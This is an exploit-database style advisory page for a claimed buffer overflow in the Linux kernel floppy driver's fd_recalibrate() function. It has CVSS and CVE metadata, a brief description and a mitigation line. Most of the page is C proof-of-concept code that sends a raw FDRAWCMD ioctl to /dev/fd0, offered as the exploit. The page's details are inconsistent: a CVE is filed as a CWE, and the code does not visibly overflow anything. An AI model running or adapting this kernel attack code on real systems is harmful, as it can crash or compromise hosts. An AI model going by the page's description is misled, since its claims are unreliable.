Floppy Disk Recalibration Vulnerability

vendor:

Linux Kernel

by:

Javier Kohen

7.8

CVSS

HIGH

Buffer Overflow

120

CWE

Product Name: Linux Kernel

Affected Version From: 2.4.x

Affected Version To: 2.6.x

Patch Exists: YES

Related CWE: CVE-2005-1763

CPE: o:linux:linux_kernel

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Linux

2005

Floppy Disk Recalibration Vulnerability

A buffer overflow vulnerability exists in the fd_recalibrate() function of the floppy disk driver in Linux kernel versions 2.4.x and 2.6.x. The vulnerability is caused by the lack of proper bounds checking when writing to the floppy disk drive. An attacker can exploit this vulnerability by sending a specially crafted request to the floppy disk driver, resulting in a buffer overflow and potentially allowing the execution of arbitrary code.

Mitigation:

Apply the appropriate patch from the vendor.

Source

Exploit-DB raw data:

#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <linux/kernel.h>
#include <string.h>
#include <sys/mman.h>
#include <linux/fd.h>

static int drive_selector(int head) {
            return (head << 2);
}

void fd_recalibrate(int fd) {
                struct floppy_raw_cmd raw_cmd;
                int tmp;

                raw_cmd.flags = FD_RAW_INTR;
                raw_cmd.cmd_count = 2;

                // set up the command
                raw_cmd.cmd[raw_cmd.cmd_count++] = 0x07; 
                raw_cmd.cmd[raw_cmd.cmd_count++] = drive_selector(0); 
                tmp = ioctl( fd, FDRAWCMD, &raw_cmd ); 
                printf("Status:%d\n",tmp); 
} 
int main(){ 
        printf("Start\n"); 
        char *d; 
        struct floppy_raw_cmd *cmd; 
         
        int fd; 
        fd = open("/dev/fd0",O_RDWR | O_NDELAY); 
        fd_recalibrate(fd); 
        close(fd); 
        printf("End\n"); 
        return 0; 
}